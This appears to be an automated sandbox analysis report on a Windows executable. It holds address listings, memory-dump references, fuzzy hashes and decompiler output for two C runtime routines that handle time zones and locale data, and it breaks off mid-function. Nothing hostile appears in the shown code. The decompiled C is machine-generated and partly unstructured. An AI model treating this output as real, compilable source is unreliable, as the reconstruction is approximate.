                                                                                                0x004424ec
                                                                                                0x00442510
                                                                                                0x00442510
                                                                                                0x00442513
                                                                                                0x00442536
                                                                                                0x0044253a
                                                                                                0x0044253a
                                                                                                0x00000000
                                                                                                0x0044253a
                                                                                                0x00442515
                                                                                                0x00442515
                                                                                                0x00442518
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044251a
                                                                                                0x0044251a
                                                                                                0x0044251d
                                                                                                0x0044252f
                                                                                                0x00000000
                                                                                                0x0044252f
                                                                                                0x0044251f
                                                                                                0x0044251f
                                                                                                0x00442522
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00442528
                                                                                                0x00000000
                                                                                                0x00442528
                                                                                                0x004424ee
                                                                                                0x004424f1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004424f1
                                                                                                0x00000000
                                                                                                0x0044271c
                                                                                                0x00442414
                                                                                                0x0044241b
                                                                                                0x00442444
                                                                                                0x0044241d
                                                                                                0x0044242c
                                                                                                0x0044242c

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16_free
                                                                                                • String ID: ;(D$a/p$am/pm
                                                                                                • API String ID: 2936374016-2297828916
                                                                                                • Opcode ID: 134c509f18729406fef0f45b447d530e6f8f2c60208d3c3a1361e3cfde8e7eb8
                                                                                                • Instruction ID: f9a5e106efaf280df31031083ff57afecb36302f92ebf721301bb0ada59f46fc
                                                                                                • Opcode Fuzzy Hash: 134c509f18729406fef0f45b447d530e6f8f2c60208d3c3a1361e3cfde8e7eb8
                                                                                                • Instruction Fuzzy Hash: 3FD1D171910206DAEB249F68CA957BBB7B0FF05300FA5415BF901AB350D7BD8D81CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 76%
                                                                                                			E00443EE3(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				int _v16;
                                                                                                				int _v20;
                                                                                                				int _v24;
                                                                                                				char _v52;
                                                                                                				int _v56;
                                                                                                				int _v60;
                                                                                                				signed int _v100;
                                                                                                				char _v272;
                                                                                                				intOrPtr _v276;
                                                                                                				char _v280;
                                                                                                				char _v356;
                                                                                                				char _v360;
                                                                                                				void* __ebp;
                                                                                                				signed int _t65;
                                                                                                				signed int _t72;
                                                                                                				signed int _t74;
                                                                                                				signed int _t78;
                                                                                                				signed int _t85;
                                                                                                				signed int _t89;
                                                                                                				signed int _t91;
                                                                                                				long _t93;
                                                                                                				signed int* _t96;
                                                                                                				signed int _t99;
                                                                                                				signed int _t102;
                                                                                                				signed int _t106;
                                                                                                				void* _t113;
                                                                                                				signed int _t116;
                                                                                                				void* _t117;
                                                                                                				void* _t119;
                                                                                                				void* _t120;
                                                                                                				void* _t122;
                                                                                                				signed int _t124;
                                                                                                				signed int _t125;
                                                                                                				signed int* _t128;
                                                                                                				signed int _t129;
                                                                                                				void* _t132;
                                                                                                				void* _t134;
                                                                                                				signed int _t135;
                                                                                                				signed int _t137;
                                                                                                				void* _t140;
                                                                                                				intOrPtr _t141;
                                                                                                				void* _t143;
                                                                                                				signed int _t150;
                                                                                                				signed int _t151;
                                                                                                				signed int _t154;
                                                                                                				signed int _t158;
                                                                                                				signed int _t161;
                                                                                                				intOrPtr* _t166;
                                                                                                				signed int _t167;
                                                                                                				intOrPtr* _t168;
                                                                                                				void* _t169;
                                                                                                				intOrPtr _t170;
                                                                                                				void* _t171;
                                                                                                				signed int _t172;
                                                                                                				int _t176;
                                                                                                				signed int _t178;
                                                                                                				char** _t179;
                                                                                                				signed int _t183;
                                                                                                				signed int _t184;
                                                                                                				void* _t191;
                                                                                                				signed int _t192;
                                                                                                				void* _t193;
                                                                                                				signed int _t194;
                                                                                                
                                                                                                				_t178 = __esi;
                                                                                                				_t171 = __edi;
                                                                                                				_t65 = E00443B22();
                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                				_t137 = _t65;
                                                                                                				_v16 = _v16 & 0x00000000;
                                                                                                				_v12 = _t137;
                                                                                                				if(E00443B80( &_v8) != 0 || E00443B28( &_v16) != 0) {
                                                                                                					L46:
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					E00437736();
                                                                                                					asm("int3");
                                                                                                					_t191 = _t193;
                                                                                                					_t194 = _t193 - 0x10;
                                                                                                					_push(_t137);
                                                                                                					_t179 = E00443B22();
                                                                                                					_v52 = 0;
                                                                                                					_v56 = 0;
                                                                                                					_v60 = 0;
                                                                                                					_t72 = E00443B80( &_v52);
                                                                                                					_t143 = _t178;
                                                                                                					__eflags = _t72;
                                                                                                					if(_t72 != 0) {
                                                                                                						L66:
                                                                                                						_push(0);
                                                                                                						_push(0);
                                                                                                						_push(0);
                                                                                                						_push(0);
                                                                                                						_push(0);
                                                                                                						E00437736();
                                                                                                						asm("int3");
                                                                                                						_push(_t191);
                                                                                                						_t192 = _t194;
                                                                                                						_t74 =  *0x46c00c; // 0x4cc22724
                                                                                                						_v100 = _t74 ^ _t192;
                                                                                                						 *0x46c334 =  *0x46c334 | 0xffffffff;
                                                                                                						 *0x46c328 =  *0x46c328 | 0xffffffff;
                                                                                                						_push(0);
                                                                                                						_push(_t179);
                                                                                                						_push(_t171);
                                                                                                						_t139 = "TZ";
                                                                                                						_t172 = 0;
                                                                                                						 *0x46d748 = 0;
                                                                                                						_t78 = E00437B05(__eflags,  &_v360,  &_v356, 0x100, "TZ");
                                                                                                						__eflags = _t78;
                                                                                                						if(_t78 != 0) {
                                                                                                							__eflags = _t78 - 0x22;
                                                                                                							if(_t78 == 0x22) {
                                                                                                								_t184 = E00440C6C(_t143, _v276);
                                                                                                								__eflags = _t184;
                                                                                                								if(__eflags != 0) {
                                                                                                									_t85 = E00437B05(__eflags,  &_v280, _t184, _v276, _t139);
                                                                                                									__eflags = _t85;
                                                                                                									if(_t85 == 0) {
                                                                                                										E004414D5(0);
                                                                                                										_t172 = _t184;
                                                                                                									} else {
                                                                                                										_push(_t184);
                                                                                                										goto L72;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_push(0);
                                                                                                									L72:
                                                                                                									E004414D5();
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t172 =  &_v272;
                                                                                                						}
                                                                                                						asm("sbb esi, esi");
                                                                                                						_t183 =  ~(_t172 -  &_v272) & _t172;
                                                                                                						__eflags = _t172;
                                                                                                						if(_t172 == 0) {
                                                                                                							L80:
                                                                                                							L47();
                                                                                                						} else {
                                                                                                							__eflags =  *_t172;
                                                                                                							if(__eflags == 0) {
                                                                                                								goto L80;
                                                                                                							} else {
                                                                                                								_push(_t172);
                                                                                                								E00443EE3(_t139, _t172, _t183, __eflags);
                                                                                                							}
                                                                                                						}
                                                                                                						E004414D5(_t183);
                                                                                                						__eflags = _v16 ^ _t192;
                                                                                                						return E00430A5B(_v16 ^ _t192);
                                                                                                					} else {
                                                                                                						_t89 = E00443B28( &_v16);
                                                                                                						_pop(_t143);
                                                                                                						__eflags = _t89;
                                                                                                						if(_t89 != 0) {
                                                                                                							goto L66;
                                                                                                						} else {
                                                                                                							_t91 = E00443B54( &_v20);
                                                                                                							_pop(_t143);
                                                                                                							__eflags = _t91;
                                                                                                							if(_t91 != 0) {
                                                                                                								goto L66;
                                                                                                							} else {
                                                                                                								E004414D5( *0x46d740);
                                                                                                								 *0x46d740 = 0;
                                                                                                								 *_t194 = 0x46d750;
                                                                                                								_t93 = GetTimeZoneInformation(??);
                                                                                                								__eflags = _t93 - 0xffffffff;
                                                                                                								if(_t93 != 0xffffffff) {
                                                                                                									_t150 =  *0x46d750 * 0x3c;
                                                                                                									_t167 =  *0x46d7a4; // 0x0
                                                                                                									_push(_t171);
                                                                                                									 *0x46d748 = 1;
                                                                                                									_v12 = _t150;
                                                                                                									__eflags =  *0x46d796; // 0x0
                                                                                                									if(__eflags != 0) {
                                                                                                										_t151 = _t150 + _t167 * 0x3c;
                                                                                                										__eflags = _t151;
                                                                                                										_v12 = _t151;
                                                                                                									}
                                                                                                									__eflags =  *0x46d7ea; // 0x0
                                                                                                									if(__eflags == 0) {
                                                                                                										L56:
                                                                                                										_v16 = 0;
                                                                                                										_v20 = 0;
                                                                                                									} else {
                                                                                                										_t106 =  *0x46d7f8; // 0x0
                                                                                                										__eflags = _t106;
                                                                                                										if(_t106 == 0) {
                                                                                                											goto L56;
                                                                                                										} else {
                                                                                                											_v16 = 1;
                                                                                                											_v20 = (_t106 - _t167) * 0x3c;
                                                                                                										}
                                                                                                									}
                                                                                                									_t176 = E0044083B(0, _t167);
                                                                                                									_t99 = WideCharToMultiByte(_t176, 0, 0x46d754, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
                                                                                                									__eflags = _t99;
                                                                                                									if(_t99 == 0) {
                                                                                                										L60:
                                                                                                										 *( *_t179) = 0;
                                                                                                									} else {
                                                                                                										__eflags = _v24;
                                                                                                										if(_v24 != 0) {
                                                                                                											goto L60;
                                                                                                										} else {
                                                                                                											( *_t179)[0x3f] = 0;
                                                                                                										}
                                                                                                									}
                                                                                                									_t102 = WideCharToMultiByte(_t176, 0, 0x46d7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
                                                                                                									__eflags = _t102;
                                                                                                									if(_t102 == 0) {
                                                                                                										L64:
                                                                                                										 *(_t179[1]) = 0;
                                                                                                									} else {
                                                                                                										__eflags = _v24;
                                                                                                										if(_v24 != 0) {
                                                                                                											goto L64;
                                                                                                										} else {
                                                                                                											_t179[1][0x3f] = 0;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								 *(E00443B1C()) = _v12;
                                                                                                								 *((intOrPtr*)(E00443B10())) = _v16;
                                                                                                								_t96 = E00443B16();
                                                                                                								 *_t96 = _v20;
                                                                                                								return _t96;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t168 =  *0x46d740; // 0x0
                                                                                                					_t178 = _a4;
                                                                                                					if(_t168 == 0) {
                                                                                                						L12:
                                                                                                						E004414D5(_t168);
                                                                                                						_t154 = _t178;
                                                                                                						_t12 = _t154 + 1; // 0x4442d4
                                                                                                						_t169 = _t12;
                                                                                                						do {
                                                                                                							_t113 =  *_t154;
                                                                                                							_t154 = _t154 + 1;
                                                                                                						} while (_t113 != 0);
                                                                                                						_t13 = _t154 - _t169 + 1; // 0x4442d5
                                                                                                						 *0x46d740 = E00440C6C(_t154 - _t169, _t13);
                                                                                                						_t116 = E004414D5(0);
                                                                                                						_t170 =  *0x46d740; // 0x0
                                                                                                						if(_t170 == 0) {
                                                                                                							goto L45;
                                                                                                						} else {
                                                                                                							_t158 = _t178;
                                                                                                							_push(_t171);
                                                                                                							_t14 = _t158 + 1; // 0x4442d4
                                                                                                							_t171 = _t14;
                                                                                                							do {
                                                                                                								_t117 =  *_t158;
                                                                                                								_t158 = _t158 + 1;
                                                                                                							} while (_t117 != 0);
                                                                                                							_t15 = _t158 - _t171 + 1; // 0x4442d5
                                                                                                							_t119 = E0043CAAC(_t170, _t15, _t178);
                                                                                                							_t193 = _t193 + 0xc;
                                                                                                							if(_t119 == 0) {
                                                                                                								_t171 = 3;
                                                                                                								_push(_t171);
                                                                                                								_t120 = E00439D83(_t159,  *_t137, 0x40, _t178);
                                                                                                								_t193 = _t193 + 0x10;
                                                                                                								if(_t120 == 0) {
                                                                                                									while( *_t178 != 0) {
                                                                                                										_t178 = _t178 + 1;
                                                                                                										_t171 = _t171 - 1;
                                                                                                										if(_t171 != 0) {
                                                                                                											continue;
                                                                                                										}
                                                                                                										break;
                                                                                                									}
                                                                                                									_pop(_t171);
                                                                                                									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
                                                                                                									if(_t137 != 0) {
                                                                                                										_t178 = _t178 + 1;
                                                                                                									}
                                                                                                									_t161 = E004374E4(_t159, _t178) * 0xe10;
                                                                                                									_v8 = _t161;
                                                                                                									while(1) {
                                                                                                										_t122 =  *_t178;
                                                                                                										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
                                                                                                											break;
                                                                                                										}
                                                                                                										_t178 = _t178 + 1;
                                                                                                									}
                                                                                                									__eflags =  *_t178 - 0x3a;
                                                                                                									if( *_t178 == 0x3a) {
                                                                                                										_t178 = _t178 + 1;
                                                                                                										_t161 = _v8 + E004374E4(_t161, _t178) * 0x3c;
                                                                                                										_v8 = _t161;
                                                                                                										while(1) {
                                                                                                											_t132 =  *_t178;
                                                                                                											__eflags = _t132 - 0x30;
                                                                                                											if(_t132 < 0x30) {
                                                                                                												break;
                                                                                                											}
                                                                                                											__eflags = _t132 - 0x39;
                                                                                                											if(_t132 <= 0x39) {
                                                                                                												_t178 = _t178 + 1;
                                                                                                												__eflags = _t178;
                                                                                                												continue;
                                                                                                											}
                                                                                                											break;
                                                                                                										}
                                                                                                										__eflags =  *_t178 - 0x3a;
                                                                                                										if( *_t178 == 0x3a) {
                                                                                                											_t178 = _t178 + 1;
                                                                                                											_t161 = _v8 + E004374E4(_t161, _t178);
                                                                                                											_v8 = _t161;
                                                                                                											while(1) {
                                                                                                												_t134 =  *_t178;
                                                                                                												__eflags = _t134 - 0x30;
                                                                                                												if(_t134 < 0x30) {
                                                                                                													goto L38;
                                                                                                												}
                                                                                                												__eflags = _t134 - 0x39;
                                                                                                												if(_t134 <= 0x39) {
                                                                                                													_t178 = _t178 + 1;
                                                                                                													__eflags = _t178;
                                                                                                													continue;
                                                                                                												}
                                                                                                												goto L38;
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                									L38:
                                                                                                									__eflags = _t137;
                                                                                                									if(_t137 != 0) {
                                                                                                										_v8 = _t161;
                                                                                                									}
                                                                                                									__eflags =  *_t178;
                                                                                                									_t124 = 0 |  *_t178 != 0x00000000;
                                                                                                									_v16 = _t124;
                                                                                                									__eflags = _t124;
                                                                                                									_t125 = _v12;
                                                                                                									if(_t124 == 0) {
                                                                                                										_t29 = _t125 + 4; // 0xfffffddd
                                                                                                										 *((char*)( *_t29)) = 0;
                                                                                                										L44:
                                                                                                										 *(E00443B1C()) = _v8;
                                                                                                										_t128 = E00443B10();
                                                                                                										 *_t128 = _v16;
                                                                                                										return _t128;
                                                                                                									}
                                                                                                									_push(3);
                                                                                                									_t28 = _t125 + 4; // 0xfffffddd
                                                                                                									_t129 = E00439D83(_t161,  *_t28, 0x40, _t178);
                                                                                                									_t193 = _t193 + 0x10;
                                                                                                									__eflags = _t129;
                                                                                                									if(_t129 == 0) {
                                                                                                										goto L44;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							goto L46;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t166 = _t168;
                                                                                                						_t135 = _t178;
                                                                                                						while(1) {
                                                                                                							_t140 =  *_t135;
                                                                                                							if(_t140 !=  *_t166) {
                                                                                                								break;
                                                                                                							}
                                                                                                							if(_t140 == 0) {
                                                                                                								L8:
                                                                                                								_t116 = 0;
                                                                                                							} else {
                                                                                                								_t9 = _t135 + 1; // 0xdde805eb
                                                                                                								_t141 =  *_t9;
                                                                                                								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
                                                                                                									break;
                                                                                                								} else {
                                                                                                									_t135 = _t135 + 2;
                                                                                                									_t166 = _t166 + 2;
                                                                                                									if(_t141 != 0) {
                                                                                                										continue;
                                                                                                									} else {
                                                                                                										goto L8;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							L10:
                                                                                                							if(_t116 == 0) {
                                                                                                								L45:
                                                                                                								return _t116;
                                                                                                							} else {
                                                                                                								_t137 = _v12;
                                                                                                								goto L12;
                                                                                                							}
                                                                                                							goto L82;
                                                                                                						}
                                                                                                						asm("sbb eax, eax");
                                                                                                						_t116 = _t135 | 0x00000001;
                                                                                                						__eflags = _t116;
                                                                                                						goto L10;
                                                                                                					}
                                                                                                				}
                                                                                                				L82:
                                                                                                			}
                                                                                                0x004440ef
                                                                                                0x004440f0
                                                                                                0x004440f2
                                                                                                0x00000000
                                                                                                0x004440f8
                                                                                                0x004440fc
                                                                                                0x00444101
                                                                                                0x00444102
                                                                                                0x00444104
                                                                                                0x00000000
                                                                                                0x0044410a
                                                                                                0x00444110
                                                                                                0x00444115
                                                                                                0x0044411b
                                                                                                0x00444122
                                                                                                0x00444128
                                                                                                0x0044412b
                                                                                                0x00444131
                                                                                                0x00444138
                                                                                                0x0044413e
                                                                                                0x00444142
                                                                                                0x00444148
                                                                                                0x0044414b
                                                                                                0x00444152
                                                                                                0x00444157
                                                                                                0x00444157
                                                                                                0x00444159
                                                                                                0x00444159
                                                                                                0x0044415c
                                                                                                0x00444163
                                                                                                0x0044417b
                                                                                                0x0044417b
                                                                                                0x0044417e
                                                                                                0x00444165
                                                                                                0x00444165
                                                                                                0x0044416a
                                                                                                0x0044416c
                                                                                                0x00000000
                                                                                                0x0044416e
                                                                                                0x00444170
                                                                                                0x00444176
                                                                                                0x00444176
                                                                                                0x0044416c
                                                                                                0x00444186
                                                                                                0x0044419a
                                                                                                0x004441a0
                                                                                                0x004441a2
                                                                                                0x004441b0
                                                                                                0x004441b2
                                                                                                0x004441a4
                                                                                                0x004441a4
                                                                                                0x004441a7
                                                                                                0x00000000
                                                                                                0x004441a9
                                                                                                0x004441ab
                                                                                                0x004441ab
                                                                                                0x004441a7
                                                                                                0x004441c7
                                                                                                0x004441ce
                                                                                                0x004441d0
                                                                                                0x004441df
                                                                                                0x004441e2
                                                                                                0x004441d2
                                                                                                0x004441d2
                                                                                                0x004441d5
                                                                                                0x00000000
                                                                                                0x004441d7
                                                                                                0x004441da
                                                                                                0x004441da
                                                                                                0x004441d5
                                                                                                0x004441d0
                                                                                                0x004441ec
                                                                                                0x004441f6
                                                                                                0x004441fb
                                                                                                0x00444200
                                                                                                0x00444207
                                                                                                0x00444207
                                                                                                0x00444104
                                                                                                0x004440f2
                                                                                                0x00443f23
                                                                                                0x00443f23
                                                                                                0x00443f29
                                                                                                0x00443f2e
                                                                                                0x00443f64
                                                                                                0x00443f65
                                                                                                0x00443f6b
                                                                                                0x00443f6d
                                                                                                0x00443f6d
                                                                                                0x00443f70
                                                                                                0x00443f70
                                                                                                0x00443f72
                                                                                                0x00443f73
                                                                                                0x00443f79
                                                                                                0x00443f84
                                                                                                0x00443f89
                                                                                                0x00443f8e
                                                                                                0x00443f98
                                                                                                0x00000000
                                                                                                0x00443f9e
                                                                                                0x00443f9e
                                                                                                0x00443fa0
                                                                                                0x00443fa1
                                                                                                0x00443fa1
                                                                                                0x00443fa4
                                                                                                0x00443fa4
                                                                                                0x00443fa6
                                                                                                0x00443fa7
                                                                                                0x00443fae
                                                                                                0x00443fb3
                                                                                                0x00443fb8
                                                                                                0x00443fbd
                                                                                                0x00443fc5
                                                                                                0x00443fc6
                                                                                                0x00443fcc
                                                                                                0x00443fd1
                                                                                                0x00443fd6
                                                                                                0x00443fdc
                                                                                                0x00443fe1
                                                                                                0x00443fe2
                                                                                                0x00443fe5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00443fe5
                                                                                                0x00443fea
                                                                                                0x00443feb
                                                                                                0x00443ff0
                                                                                                0x00443ff2
                                                                                                0x00443ff2
                                                                                                0x00443ffa
                                                                                                0x00444000
                                                                                                0x00444003
                                                                                                0x00444003
                                                                                                0x00444007
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00444011
                                                                                                0x00444011
                                                                                                0x00444014
                                                                                                0x00444017
                                                                                                0x00444019
                                                                                                0x00444027
                                                                                                0x00444029
                                                                                                0x00444033
                                                                                                0x00444033
                                                                                                0x00444035
                                                                                                0x00444037
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044402e
                                                                                                0x00444030
                                                                                                0x00444032
                                                                                                0x00444032
                                                                                                0x00000000
                                                                                                0x00444032
                                                                                                0x00000000
                                                                                                0x00444030
                                                                                                0x00444039
                                                                                                0x0044403c
                                                                                                0x0044403e
                                                                                                0x00444049
                                                                                                0x0044404b
                                                                                                0x00444055
                                                                                                0x00444055
                                                                                                0x00444057
                                                                                                0x00444059
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00444050
                                                                                                0x00444052
                                                                                                0x00444054
                                                                                                0x00444054
                                                                                                0x00000000
                                                                                                0x00444054
                                                                                                0x00000000
                                                                                                0x00444052
                                                                                                0x00444055
                                                                                                0x0044403c
                                                                                                0x0044405b
                                                                                                0x0044405b
                                                                                                0x0044405d
                                                                                                0x00444061
                                                                                                0x00444061
                                                                                                0x00444066
                                                                                                0x00444068
                                                                                                0x0044406b
                                                                                                0x0044406e
                                                                                                0x00444070
                                                                                                0x00444073
                                                                                                0x0044408b
                                                                                                0x0044408e
                                                                                                0x00444091
                                                                                                0x00444099
                                                                                                0x0044409e
                                                                                                0x004440a3
                                                                                                0x00000000
                                                                                                0x004440a3
                                                                                                0x00444075
                                                                                                0x0044407a
                                                                                                0x0044407d
                                                                                                0x00444082
                                                                                                0x00444085
                                                                                                0x00444087
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00444089
                                                                                                0x00443fd6
                                                                                                0x00000000
                                                                                                0x00443fbd
                                                                                                0x00443f30
                                                                                                0x00443f30
                                                                                                0x00443f32
                                                                                                0x00443f34
                                                                                                0x00443f34
                                                                                                0x00443f38
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00443f3c
                                                                                                0x00443f50
                                                                                                0x00443f50
                                                                                                0x00443f3e
                                                                                                0x00443f3e
                                                                                                0x00443f3e
                                                                                                0x00443f44
                                                                                                0x00000000
                                                                                                0x00443f46
                                                                                                0x00443f46
                                                                                                0x00443f49
                                                                                                0x00443f4e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00443f4e
                                                                                                0x00443f44
                                                                                                0x00443f59
                                                                                                0x00443f5b
                                                                                                0x004440aa
                                                                                                0x004440aa
                                                                                                0x00443f61
                                                                                                0x00443f61
                                                                                                0x00000000
                                                                                                0x00443f61
                                                                                                0x00000000
                                                                                                0x00443f5b
                                                                                                0x00443f54
                                                                                                0x00443f56
                                                                                                0x00443f56
                                                                                                0x00000000
                                                                                                0x00443f56
                                                                                                0x00443f2e
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00443F65
                                                                                                • _free.LIBCMT ref: 00443F89
                                                                                                • _free.LIBCMT ref: 00444110
                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045A1AC), ref: 00444122
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046D754,000000FF,00000000,0000003F,00000000,?,?), ref: 0044419A
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046D7A8,000000FF,?,0000003F,00000000,?), ref: 004441C7
                                                                                                • _free.LIBCMT ref: 004442DC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                • String ID:
                                                                                                • API String ID: 314583886-0
                                                                                                • Opcode ID: 6df832b8d7e2a1e980441203f23640d2cfea4156c0f96e810c9845a3873a7b30
                                                                                                • Instruction ID: 28e16f1df85532f3daaa5ae9bc663f82d65e35abc3979ea33a8e3f072f87fb4a
                                                                                                • Opcode Fuzzy Hash: 6df832b8d7e2a1e980441203f23640d2cfea4156c0f96e810c9845a3873a7b30
                                                                                                • Instruction Fuzzy Hash: C9C15771E00244ABFB20DF69CC41BABBBB8EF95355F1401AFE58497242EB389E41C759
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E00449EF5(void* __edx, char _a4) {
                                                                                                				void* _v8;
                                                                                                				void* _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				char _v28;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* _t53;
                                                                                                				void _t57;
                                                                                                				intOrPtr _t58;
                                                                                                				intOrPtr _t59;
                                                                                                				intOrPtr _t60;
                                                                                                				intOrPtr _t61;
                                                                                                				signed int _t64;
                                                                                                				char _t92;
                                                                                                				char _t100;
                                                                                                				void* _t101;
                                                                                                				signed int _t104;
                                                                                                				void* _t107;
                                                                                                				void* _t121;
                                                                                                				char* _t123;
                                                                                                				signed int _t127;
                                                                                                				intOrPtr* _t132;
                                                                                                				void* _t133;
                                                                                                				intOrPtr* _t134;
                                                                                                				signed int _t135;
                                                                                                				signed int _t136;
                                                                                                				signed int _t137;
                                                                                                				signed int _t138;
                                                                                                				char* _t139;
                                                                                                
                                                                                                				_t121 = __edx;
                                                                                                				_t100 = _a4;
                                                                                                				_v28 = _t100;
                                                                                                				_v24 = 0;
                                                                                                				if( *((intOrPtr*)(_t100 + 0xb0)) != 0 ||  *((intOrPtr*)(_t100 + 0xac)) != 0) {
                                                                                                					_v16 = 1;
                                                                                                					_t53 = E00440628(_t101, 1, 0x50);
                                                                                                					_v8 = _t53;
                                                                                                					if(_t53 != 0) {
                                                                                                						_t104 = 0x14;
                                                                                                						memcpy(_t53,  *(_t100 + 0x88), _t104 << 2);
                                                                                                						_t132 = E00440C6C(0, 4);
                                                                                                						_t127 = 0;
                                                                                                						_v12 = _t132;
                                                                                                						E004414D5(0);
                                                                                                						_pop(_t107);
                                                                                                						if(_t132 != 0) {
                                                                                                							 *_t132 = 0;
                                                                                                							if( *((intOrPtr*)(_t100 + 0xb0)) == 0) {
                                                                                                								_t133 = _v8;
                                                                                                								_t57 =  *0x46c178; // 0x46c170
                                                                                                								 *_t133 = _t57;
                                                                                                								_t58 =  *0x46c17c; // 0x46d64c
                                                                                                								 *((intOrPtr*)(_t133 + 4)) = _t58;
                                                                                                								_t59 =  *0x46c180; // 0x46d64c
                                                                                                								 *((intOrPtr*)(_t133 + 8)) = _t59;
                                                                                                								_t60 =  *0x46c1a8; // 0x46c174
                                                                                                								 *((intOrPtr*)(_t133 + 0x30)) = _t60;
                                                                                                								_t61 =  *0x46c1ac; // 0x46d650
                                                                                                								 *((intOrPtr*)(_t133 + 0x34)) = _t61;
                                                                                                								L19:
                                                                                                								 *_v12 = 1;
                                                                                                								if(_t127 != 0) {
                                                                                                									 *_t127 = 1;
                                                                                                								}
                                                                                                								goto L21;
                                                                                                							}
                                                                                                							_t134 = E00440C6C(_t107, 4);
                                                                                                							_v20 = _t134;
                                                                                                							E004414D5(0);
                                                                                                							if(_t134 == 0) {
                                                                                                								L11:
                                                                                                								E004414D5(_v8);
                                                                                                								E004414D5(_v12);
                                                                                                								return _v16;
                                                                                                							}
                                                                                                							 *_t134 = 0;
                                                                                                							_t128 =  *((intOrPtr*)(_t100 + 0xb0));
                                                                                                							_t135 = E0044C344(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t134,  &_v28, 1,  *((intOrPtr*)(_t100 + 0xb0)), 0xe, _v8);
                                                                                                							_t136 = _t135 | E0044C344(_t100, _t121,  *((intOrPtr*)(_t100 + 0xb0)), _t135,  &_v28, 1, _t128, 0xf, _v8 + 4);
                                                                                                							_v16 = _v8 + 8;
                                                                                                							_t137 = _t136 | E0044C344(_t100, _t121, _t128, _t136,  &_v28, 1, _t128, 0x10, _v8 + 8);
                                                                                                							_t138 = _t137 | E0044C344(_t100, _t121, _t128, _t137,  &_v28, 2, _t128, 0xe, _v8 + 0x30);
                                                                                                							if((E0044C344(_t100, _t121, _t128, _t138,  &_v28, 2, _t128, 0xf, _v8 + 0x34) | _t138) == 0) {
                                                                                                								_t123 =  *_v16;
                                                                                                								while( *_t123 != 0) {
                                                                                                									_t92 =  *_t123;
                                                                                                									if(_t92 < 0x30 || _t92 > 0x39) {
                                                                                                										if(_t92 != 0x3b) {
                                                                                                											goto L16;
                                                                                                										}
                                                                                                										_t139 = _t123;
                                                                                                										do {
                                                                                                											 *_t139 =  *((intOrPtr*)(_t139 + 1));
                                                                                                											_t139 = _t139 + 1;
                                                                                                										} while ( *_t139 != 0);
                                                                                                									} else {
                                                                                                										 *_t123 = _t92 - 0x30;
                                                                                                										L16:
                                                                                                										_t123 = _t123 + 1;
                                                                                                									}
                                                                                                								}
                                                                                                								_t127 = _v20;
                                                                                                								_t133 = _v8;
                                                                                                								goto L19;
                                                                                                							}
                                                                                                							E00449E8C(_v8);
                                                                                                							_v16 = _v16 | 0xffffffff;
                                                                                                							goto L11;
                                                                                                						}
                                                                                                						E004414D5(_v8);
                                                                                                						return 1;
                                                                                                					}
